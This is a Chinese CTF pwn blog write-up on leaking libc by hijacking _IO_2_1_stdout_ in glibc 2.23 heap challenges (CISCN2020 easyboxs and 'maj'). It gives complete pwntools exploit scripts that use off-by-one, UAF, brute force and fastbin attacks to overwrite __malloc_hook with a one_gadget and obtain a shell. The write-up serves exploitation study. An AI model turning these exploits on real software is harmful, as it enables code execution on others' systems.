【八芒星计划】 劫持_IO_2_1_stdout_泄露libc

最新推荐文章于 2024-08-19 15:11:00 发布
最新推荐文章于 2024-08-19 15:11:00 发布
阅读量1k 收藏 7
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108352398
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单

文章目录

CISCN2020 easyboxs

libc2.23
off by one+劫持_IO_2_1_stdout_
有add和free

add(0, 0x18, 'a')
add(1, 0xf8, 'a')
add(2, 0x68, 'a')
add(3, 0x68, 'a')
add(4, 0x18, 'a')
free(0)
add(0, 0x18, 'a'*0x18+'\xe1')
free(1)

由于是off by one,所以直接改size,free,造成堆块复用

free(2)
add(0, 0xd8, 'a')
add(5, 0x18, 'a')
add(0, 0x18, '\xdd\x25')
free(5)
add(5, 0x18, p64(0)*3+'\x71')
add(0, 0x68, 'a')
add(0, 0x68, 'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['_IO_2_1_stderr_'] - 192
info('libc_base', libc_base)
og = libc_base + o_g[3]
malloc_hook = libc_base + libc.sym['__malloc_hook']

先把2free掉,然后精心构造,使得chunk2的fd有unsortedbin的地址,同时把这个地址的后四位改成\xdd\x25,并且上面要有一个0x18的chunk,让我们可以后面再把chunk2的size改回0x71,才能从0x70的fastbin里申请chunk

为什么是\xdd\x25,其实只有后三位5dd是确定的,前一位填什么都行,是要爆破的,这个位置有一个0x7f,可以让我们fastbin attack

add(0, 0x68, 'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')

这是我们要往_IO_2_1_stdout_里填充的,照着填就行,具体的原因比较复杂

在这里插入图片描述
看着好像除了flag都没改,其实已经改过了,具体的可以b _int_malloc 然后fin去看

p _IO_list_all
p (*(struct _IO_FILE_plus *)0x7f3034623b78)
p (*(struct _IO_jump_t *)(0x556306725500+0xd8))

这些都是可以用的指令,具体自己改

free(3)
add(0, 0x58, p64(1)*0x9+p64(0x71)+p64(malloc_hook-0x23))
add(0, 0x68, 'a')
add(0, 0x68, 'a'*0x13+p64(og))

最后free(3)
然后申请下来改fd,然后fastbin attack改malloc_hook为og,结束

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './pwn'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(ch):
    sla('>>>', str(ch))
def add(index, size, content):
    menu(1)
    sla('idx:', str(index))
    sla('len:', str(size))
    sea('content:', content)

def free(index):
    menu(2)
    sla('idx:', str(index))
IO_2_1_stdout = libc.sym['_IO_2_1_stdout_']

while True:
    local_file  = './pwn'
    local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
    remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
    select = 0
    if select == 0:
        r = process(local_file)
        libc = ELF(local_libc)
    else:
        r = remote('', )
        libc = ELF(remote_libc)
        elf = ELF(local_file)
    try:
        add(0, 0x18, 'a')
        add(1, 0xf8, 'a')
        add(2, 0x68, 'a')
        add(3, 0x68, 'a')
        add(4, 0x18, 'a')
        free(0)
        add(0, 0x18, 'a'*0x18+'\xe1')
        free(1)
        free(2)
        add(0, 0xd8, 'a')
        add(5, 0x18, 'a')
        add(0, 0x18, '\xdd\x25')
        free(5)
        add(5, 0x18, p64(0)*3+'\x71')
        add(0, 0x68, 'a')
        add(0, 0x68, 'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
        libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['_IO_2_1_stderr_'] - 192
        info('libc_base', libc_base)
        og = libc_base + o_g[3]
        malloc_hook = libc_base + libc.sym['__malloc_hook']
        free(3)
        add(0, 0x58, p64(1)*0x9+p64(0x71)+p64(malloc_hook-0x23))
        add(0, 0x68, 'a')
        add(0, 0x68, 'a'*0x13+p64(og)) 
        debug()
        sl('1')
        break
    except:
        r.close()
        continue
r.interactive()

try是用来爆破的

maj

libc2.23
UAF+劫持_IO_2_1_stdout_
有add,free,edit

add(0x68)
add(0x68)
add(0x68)
edit(0, p64(0)+p64(0x71))
edit(1, p64(0)+p64(0x61))
edit(2, p64(0)*3+p64(0x51))
free(0)
free(1)
edit(1, '\x10')
add(0x60)#3
add(0x60)#4

先add三个chunk,然后构造好我们需要的数据,0x71是fake chunk, 0x61和0x51是为了过free时nextchunk的size的检测
edit改fd,然后申请回来,chunk4就是我们的fake chunk

free(1)
edit(4, p64(0)*0xb+p64(0x91))
free(1)
edit(4, p64(0)*0xb+p64(0x71))
edit(1, '\xdd\x25')
add(0x60)
add(0x60)
edit(6, 'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['_IO_2_1_stderr_'] - 192
info('libc_base', libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
og = libc_base + o_g[3]

free1,然后通过4把1的size改成0x91,然后再free1, chunk1就在unsortedbin里了,这样一来在fastbin里的chunk1的fd就有main_arena+96的地址了
然后再改成0x71,就可以fastbin attack了

free(0)
free(1)
free(0)
edit(1, p64(malloc_hook-0x23))
add(0x60)
add(0x60)
add(0x60)
edit(9, 'a'*0x13+p64(og))

然后double free,fastbin attack 结束

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './maj'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'

select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(ch):
    sla('>> ', str(ch))
def add(size):
    menu(1)
    sl('80')
    sla('______?', str(size))
    sea('start_the_game,yes_or_no?', 'yes')
def free(index):
    menu(2)
    sla('index ?', str(index))
def edit(index, content):
    menu(4)
    sla('index ?', str(index))
    sea('__new_content ?', content)
while True:
    local_file  = './maj'
    local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
    remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
    select = 0
    if select == 0:
        r = process(local_file)
        libc = ELF(local_libc)
    else:
        r = remote('', )
        libc = ELF(remote_libc)
    elf = ELF(local_file)

    try:
        add(0x68)
        add(0x68)
        add(0x68)
        edit(0, p64(0)+p64(0x71))
        edit(1, p64(0)+p64(0x61))
        edit(2, p64(0)*3+p64(0x51))
        free(0)
        free(1)
        edit(1, '\x10')
        add(0x60)
        add(0x60)
        free(1)
        edit(4, p64(0)*0xb+p64(0x91))
        free(1)
        edit(4, p64(0)*0xb+p64(0x71))
        edit(1, '\xdd\x25')
        add(0x60)
        add(0x60)
        edit(6, 'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
        libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['_IO_2_1_stderr_'] - 192
        info('libc_base', libc_base)
        malloc_hook = libc_base + libc.sym['__malloc_hook']
        og = libc_base + o_g[3]
        free(0)
        free(1)
        free(0)
        edit(1, p64(malloc_hook-0x23))
        add(0x60)
        add(0x60)
        add(0x60)
        edit(9, 'a'*0x13+p64(og))
        #debug()
        #sl('1')
        break
    except:
        r.close()
        continue

r.interactive()

2.27

2.27的先提一下,后面再写题

realloc(0x180, ‘c’*0x78+p64(0xc1)+p8(0x60)+p8(0x87))

realloc(0x100, p64(0xfbad1887)+p64(0)*3+p8(0x58))
由于tcache,所以不用再担心size,可以直接爆破到stdout,也就是0x?760
改flag,read全部用0填充,write_base末尾改成0x58,这样就指向_IO_2_1_stderr_+216,其中存储着 _IO_file_jumps的地址

真岛忍
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
哒君的博客
08-11 1576
GitHub 例行公事 可以看出保护全开 进行分析 可以发现程序功能很简单 create delete rename create 限定大小最大只能是0x60 index只能是0-9但是是自个输入的 存在一个结构,struct[0] = size,struct[1] = ptr readn函数没有用\x00截断 delete 中间index的判断有问题,且存在uaf ren...
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2115
realloc好题
好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc
hollk’s blog
02-19 5388
前言 这道题是wiki上tcache attack部分的第二道例题,原题在wiki那个题包里,需要自己找一下,忘记在哪了。。。。。其实个人感觉这道题的考点并不是tcache attack,而是在于IO_FILE的利用。因为这道题与以往所见并不太相同,并没有输出函数,也就意味着无法通过往常的方式利用程序自身的输出函数进行泄露内存地址,所以这时候就需要利用IO_FILE的方式进行输出(我也是第一次遇到,肝了好几天)。这篇文章主要分为两个部分,前半部分主要讲解IO_FILE泄露libc的方式,后半部分是HITCO
关于glibc-all-in-one下载libc2.35以上报错问题
2302_79899078的博客
06-18 220
xclibc -x ./pwn ./libc-版本。下载2.35时报错:原因是缺少解压工具zstd。xclibc -c libc版本。下载后重新输命令就可以了。附加xclibc命令。
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 261
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1326
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc
weixin_44145820的博客
04-17 1984
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5287
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1595
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
IO_FILE:2018 HCTF the_end
Mira_Hu的博客
02-13 1758
kips: libc2.23 标准输入输出 定义顺序 #define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \ static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \ struct _IO_FILE_plus NAME \ = {FILEBUF_LITERAL(CHAI...
wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数)
seaaseesa的博客
06-10 1014
wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,程序里没有show功能 有一个后门函数 Delete功能存在UAF,但是delete功能只能用3次,因此劫持_IO_2_1_stdout泄露libc地址次数不够用。 由于got表也不可写,那么我们可以劫持bss段上的stdout指针,将其指向我们伪造的_IO_FILE结构体处,就可以调用backdoor函数了。 #coding:ut
house of botcake利用模板+爆破stdout泄露地址 glibc2.31
FUCKING12的博客
11-06 197
【代码】house of botcake利用模板+爆破stdout泄露地址。
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 397
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
Magic_Book(stdout泄露地址)
FUCKING12的博客
11-03 208
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址和堆地址,我们可以利用这2个残余地址来爆破stdout。首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。因为我们没有show函数无法泄露地址,所以我们需要打stdout泄露地址。
八芒星计划】 _IO_2_1_stdout_和_IO_2_1_stdin_ 的任意地址读和任意地址写
carol2358的博客
09-04 919
文章目录前言一、GKCTF2020]Domo总结 前言 这篇记一下任意地址读和任意地址写 _IO_2_1_stdout_的任意地址读,_IO_write_base为读取的起始地址,_IO_write_ptr为读取的末地址,并且flag的值要得是0xfbad1800才能正常读取   _IO_2_1_stdin_的任意地址写跟_IO_2_1_stdout_的任意地址读类似,也是需要控制flag还有_IO_buf_base和_IO_buf_end。 这回除了flag、_IO_buf_base和_IO_b
重学IO:利用_IO_2_1_stdout泄露libc
最新发布
2301_79327647的博客
08-19 824
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35。
linux x25协议通信,跨协议通信技术利用
weixin_33196106的博客
05-14 207
#什么是跨协议通信#跨协议通信技术(Inter-ProtocolCommunication)是指两种不同的协议可以交换指令和数据的技术。其中一种称为目标协议,另外一种称为载体协议。目标协议就是我们最终想要通信的协议,而载体协议是用来封装我们最后想要发送的指令和数据。这种类型的通信想要完成有两个必要条件:1.目标协议必须容错性比较好.这是因为我们是通过一个载体协议来传输指令的,这样就很可能会掺...
三字母词及转义字符
sophia__yu的博客
11-12 364
//三字母词,转义字符,转义字符是一个字符,如\t ,\ddd,\xddd 是一个字符 #include #include int main() { printf("(happy day\?\?)\n");// ??)是三字母词,\?使?不再是三字母词里? printf("\"\n");//"""添加成\",转义成\",用于表示可输出" //printf("%c\n", ''');
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 753
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值